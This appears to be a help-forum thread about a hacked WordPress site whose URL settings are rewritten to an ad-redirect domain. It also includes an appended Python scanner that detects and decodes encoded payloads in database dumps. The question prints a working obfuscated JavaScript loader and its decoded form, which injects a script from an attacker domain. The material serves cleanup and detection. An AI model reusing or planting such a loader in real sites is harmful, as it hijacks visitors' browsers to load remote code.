codesayan

Reputation: 1715

How to retrieve hacked WordPress site

So basically my client's website is hacked, and every time I open it, it redirects to other sites (mostly ads).

Its behavior: every time I run the website, it automatically changes the home URL and site URL.

I tried changing the home URL and site URL in cPanel, but when I run the site again it redirects, and after that the value in cPanel is also automatically changed to that address.

I am able to access the backend after changing the URL in cPanel, until I run the frontend. I ran a scan with the Sucuri plugin and it gives me the error message below:

11: 1569826918_2:"Error: admin, 122.160.112.18; General settings changed: (multiple entries): siteurl: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/t3.js?',home: from 'https:\/\/foo.com' to 'https:\/\/bes.belaterbewasthere.com\/reserv\/\/a3.js?'"

Site address changed for privacy reasons. The redirect URL is there.

I checked every possible file but can't find any suspicious code. Can anyone please help me?

Edit: After a few hours of research I figured out that this is injected from the encrypted code below:

    eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,101,108,101,109,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,9,101,108,101,109,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,32,10,32,32,32,32,101,108,101,109,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,98,101,115,46,98,101,108,97,116,101,114,98,101,119,97,115,116,104,101,114,101,46,99,111,109,47,99,111,114,110,47,102,108,101,120,46,106,115,63,116,112,61,55,57,57,39,59,10,32,32,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,101,108,101,109,41,59,10,32,32,125,41,40,41,59));

When I decrypted this code (using this site: https://malwaredecoder.com/), I get this:

    eval( (function() {
        var elem = document.createElement('script');
        elem.type = 'text/javascript';
        elem.src = 'https://bes.belaterbewasthere.com/corn/flex.js?tp=799';
        document.getElementsByTagName("head")[0].appendChild(elem);
    })(););

Yes! That's the URL, https://bes.belaterbewasthere.com, that it redirected to and that throws ads.

Upvotes: 0

Views: 1224

Answers (1)

Roy

Reputation: 11

I had the same problem two days ago and had my issue fixed by overwriting the full database with a two-week-old one from when the code wasn't there yet. The code was in a table used by Rich Reviews, where it was injected. That plugin is known for this issue and is removed from WordPress because of it. After removing the plugin also, I was in contact with Google AdWords, and they checked if everything was fine now, and it was, and they restarted the AdWords campaign.

If you don't have a backup, you might try just deleting the plugin associated with the table where the code is (maybe it is also Rich Reviews) to solve the issue. The table I had with this issue was rr_options.

Upvotes: 1
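Added example, not part of the original question or answer: a static scan of a SQL dump that finds `String.fromCharCode(...)` payloads like the one in the question, decodes them without running any JavaScript, and reports which table they sit in, as the answer did by hand for `rr_options`. The function names, the sample rows, and the `example.invalid` URL are constructed for illustration.

```python
import re

# String.fromCharCode(32,40,...) with the decimal list captured.
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*((?:\d+\s*,\s*)*\d+)\s*\)")
INSERT_RE = re.compile(r"INSERT\s+INTO\s+`?(\w+)`?", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"\\)]+")
MIN_CODES = 20  # skip short, probably legitimate fromCharCode calls


def decode_charcodes(arg_list):
    """Decode '104,116,...' to text; nothing is evaluated as JavaScript."""
    return "".join(chr(int(n)) for n in arg_list.split(",") if int(n) < 0x110000)


def scan_dump(sql_text):
    """Report each encoded script: table, dump line, decoded text, URLs."""
    findings, table = [], None
    for lineno, line in enumerate(sql_text.splitlines(), 1):
        insert = INSERT_RE.search(line)
        if insert:
            table = insert.group(1)  # table the following values belong to
        for hit in CHARCODE_RE.finditer(line):
            if hit.group(1).count(",") + 1 < MIN_CODES:
                continue
            decoded = decode_charcodes(hit.group(1))
            findings.append({"table": table, "line": lineno,
                             "decoded": decoded, "urls": URL_RE.findall(decoded)})
    return findings


def encode(js):
    """Build a constructed payload in the same encoding, for the sample only."""
    return ",".join(str(ord(c)) for c in js)


# Constructed sample data: placeholder domain, made-up rows and column values.
SAMPLE_JS = ("(function(){var e=document.createElement('script');"
             "e.src='https://cdn.example.invalid/x.js';"
             "document.head.appendChild(e);})();")
SAMPLE_DUMP = "\n".join([
    "INSERT INTO `wp_options` VALUES (1,'siteurl','https://foo.example','yes');",
    "INSERT INTO `rr_options` VALUES (7,'text','<script>eval("
    "String.fromCharCode(%s));</script>');" % encode(SAMPLE_JS),
])

if __name__ == "__main__":
    for f in scan_dump(SAMPLE_DUMP):
        print(f["table"], "line", f["line"], f["urls"])
        print(f["decoded"])
```

To use it on a real site, pass the text of a database export to `scan_dump` and inspect the reported table and URLs before deciding whether to restore a backup or remove the owning plugin.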
